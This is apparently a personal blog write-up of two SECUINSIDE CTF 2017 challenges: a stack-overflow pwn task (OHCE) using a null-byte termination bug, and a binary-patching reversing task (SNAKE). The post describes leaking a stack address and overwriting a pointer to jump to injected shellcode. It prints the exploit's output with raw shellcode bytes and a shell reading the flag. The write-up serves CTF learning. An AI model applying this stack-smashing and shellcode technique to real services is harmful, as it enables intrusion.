20170701_SECUINSIDECTF Writeup

20170701_SECUINSIDECTF Writeup

Yesterday and today, I joined in 20170701_SECUINSIDECTF. There were many difficult problems, and unsolved one.

Fortunately, I could solve 2problem, OHCE and SNAKE. I wrote my solution below.

OHCE pwn

 

This is Stack base overflow chall. This process as below.

 

– First print menu, and I can choose 1. echo 2, reverse echo, 3.exit

– if choose 1, I can type something, and return echo

– if choose 2, I can type something, and return reverse string I typed

– if choose 3, exit program

 

Let’s analyze it. And realize that this don’t have any protection,

 

$ checksec ohce
[*] ‘/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce’
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

 

Next, I continue to execute it, several minutes, I find out that there is Null Byte Termination Vulnerability.

If I input 31+32*n chars in echo mode, next data is leaked. And when I input it in reverse echo, program is halted.

—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�?Hc�
—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�cH?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)

 

What’s happened? Below picuture show that stack information when input 31+32*n chars.

(In this picture unfortunately data of 0x7fffffffdae0 is 00, so this leak don’t occurred…)

 

 

Then reverse echo, because of Null Byte Termination Vulnerability, I can overwrite next address.

Finally overwritten address become esp in [0x400268 mov rsp,rbp], I can got rip.

 

Exploitation is below.

– First leak stack address to write 31 chars in echo

– Next write many chars and stack address to go to shellscript (address in red rectangle) in echo

– Write shellscript and stack address to go to below address (address in light blue rectangle) in reverse echo.

 

 

 
$ python solve_ohce.py
[+] Opening connection to 13.124.134.94 on port 8888: Done
—————–
\x001. echo
2. echo(Reverse)
3. Exit\x00
—————–
\x00 >
0x7ffe4db737a0
0x7ffe4db73770
\x7f\xfeM\xb76`AAAAA\x05\x0f;\xb0^TWR\x99_TS��H\xff\x97\x8cБ\x96\x9dѻH�1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
[*] Switching to interactive mode
\x00\x7f\xfeM\xb77\xa0
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05AAAAA`6\xb7M\xfe\x7f$
$
$
$
$
$ ls
flag
ohce
$ cat flag
SECU[the_true_world_and_1n_here_1s_the_dream]
[*] Got EOF while reading in interactive
$
 

SNAKE rev

 

This is the old snake game program.

Several hours investigation, I recognize that this algorithm is as below. (function name is named by me.)

 


 

This program calculate enc_flag and xor-ed another data in clear_game function.

At first, I tried to make script to make those data, but I can’t do this. So I change my direction as below.

 

– I patch program to return true on if(judge_goal) statement.

 

 

 

– I patch program not to change time_duration.

 

 

Then execute it, After several minutes, I can get flag. (You must control snake not to crash to wall until getting flag.)

 

 

 

 

 
SECU[hack_is_the_wine_of_life._Let’s_drink_it.]�u����@
 
 
Patched program:

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s